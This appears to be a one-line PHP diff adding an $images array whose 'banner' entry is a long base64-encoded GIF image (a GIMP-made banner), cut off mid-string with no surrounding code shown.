+$images = array( "banner" =>"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